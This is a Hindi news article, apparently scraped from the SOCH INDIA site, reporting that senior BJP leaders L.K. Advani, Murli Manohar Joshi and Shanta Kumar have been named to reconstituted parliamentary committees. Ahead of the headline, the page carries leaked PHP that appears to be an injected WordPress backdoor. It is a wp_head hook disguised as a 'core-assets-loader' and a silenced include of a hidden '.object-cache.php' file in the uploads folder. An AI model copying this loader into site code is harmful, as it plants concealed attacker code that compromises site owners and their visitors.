add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); आडवाणी, जोशी और शांता कुमार को मिली संसदीय कमेटियों में जगह – SOCH INDIA
Menu

देश
आडवाणी, जोशी और शांता कुमार को मिली संसदीय कमेटियों में जगह

nobanner

पार्टी में दरकिनार कर दिए बुजुर्ग भाजपा नेता लालकृष्ण आडवाणी, शांता कुमार और मुरली मनमोहन जोशी को संसदीय पैनल का सदस्य बनाया गया है। आडवाणी और शांता कुमार को सार्वजनिक उपक्रम से संबंधित संसदीय कमेटी में शामिल किया गया है, जबकि मुरली मनोहर जोशी को आकलन कमेटी का सदस्य नियुक्त किया गया है। दरअसल हाल में तीन संसदीय पैनलों का पुनर्गठन किया है।

इससे जोशी, आडवाणी और शांता कुमार को इसमें शामिल करने का मौका मिल गया। इन तीनों पैनलों का कार्यकाल 1 मई से शुरू होगा। मंगलवार को आकलन कमेटी, सार्वजनिक उपक्रम और अनुसूचित जाति- जनजाति से जुड़ी संसदीय समिति के लिए चुनाव हुए। अनुसूचित जाति-जनजाति से जुड़े पैनल में भाजपा सदस्य और झारखंड के पूर्व डीजीपी वी डी राम और लोक जनशक्ति पार्टी के रामचंद्र पासवान शामिल हैं।

लोक लेखा समिति का पुनर्गठन अभी होना है। सरकार ने पिछले दिनों संसदीय कमेटियों को लेकर गंभीर रुख अख्तियार किया था। मोदी सरकार का मानना है कि इन कमेटी के सदस्यों को अपना कामकाज गंभीरता से करना चाहिए। यही वजह है कि इसने हाल में गंभीर रवैया न रखने वाले कुछ सदस्यों को हटा दिया था। ऐसे करीब एक दर्जन भाजपा नेता इन पैनलों से हटाए गए थे। इनका कार्यकाल 30 अप्रैल को खत्म हो रहा था लेकिन गंभीरता न दिखाने की वजह से उन्हें पहले ही हटा दिया गया था।